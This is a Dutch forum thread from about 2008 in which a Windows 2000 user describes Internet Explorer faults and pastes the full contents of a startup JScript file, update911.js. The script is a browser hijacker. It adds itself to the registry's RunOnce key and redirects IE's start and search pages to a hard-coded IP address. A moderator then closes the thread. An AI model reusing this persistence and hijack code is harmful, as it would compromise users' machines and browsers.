[WIN2k] Internet explorer problemen

Pagina: 1
Acties:
  • 26 views sinds 30-01-2008

• mimic
  • Registratie: Februari 2002
  • Niet online

mimic

O ja joh?

Topicstarter
Ik heb telkens als ik aan het surfen ben van die meldings dat ik geen toegang heb op de server, heel vreemd, want soms kan ik de pagina wel gewoon bekijken en soms kan hij ook de pagina niet vinden.

Soms is het ook zo dat sommige dingen zoals plaatjes e.d. niet geladen worden of slechts voor de helft.

Dus ik scannen met ad-aware om te kijken of ik spyware had oid op mijn pctje, maar helaas, hij vond niks.

Misschien een probleempje oid in IE dacht ik, dus ik opnieuw opstarten...

Bij het stukje dat mijn pc eigenlijk van "voorbereiden van netwerkverbindingen" overgaat naar het windows werkplatvorm bleef hij hangen

Dus ik ctrl+shift+esc om taakbeheer te openen, en zie het progje Wscript.exe staan van windows, probeer deze te killen om te kijken of hij dar doorstart, gebeurt niet, hij komt net zo hard terug..

Toen kilde ik explorer.exe maar, en Wscript.exe verdween ook uit de running tasks, vreemd dacht ik, dus ik start explorer.exe handmatig, en toen kreeg ik wel mijn werkplatvorm, en mn pc start gewoon verder op...

Dus ik maar eens kijken in het register van windows, kom ik bij RunOnce bij local machine tegen dat hij een javascript filetje moet openen bij het starten van windows.. deze staat in c:\winnt\update911.js

dus ik naar mn %windir% en bewerk het progje, zie ik dat daarin staat dat hij dingen moet toevoegen aan het register..

-----inhoud van update911.js

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

-----einde

Dit is typisch een geval van spyware, maar ik vroeg mij dus af of dit ook te maken heeft met mijn internet explorer problemen.

Ik heb mijn virus scanner up-2-date, en heb de nieuwste versie van ad-aware, maar ik vindt niks..

Zijn er mensen die ook deze problemen hebben?
Of weet iemand misschien wat ik er aan kan doen?

Het is vreselijk irritant :(

• elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

MiMiC, toen jij dat zag, ben je meteen gaan zoeken naar update911.js op GoT?
Hier is toch wel het een en ander over te vinden - zie bv. ook de FAQ om te zien dat AdAware niet de enige tool is voor trojans/spyware/e.d. (Software Algemeen FAQ)

Verder - je topic hoort niet in Windows Operated Systems thuis maar in Software Algemeen, maar omdat je hier al zo'n tijd mee draait, en toch niet even de moeite hebt genomen om een en ander uit te zoeken gaat dit topic dicht :)

Dit topic is gesloten.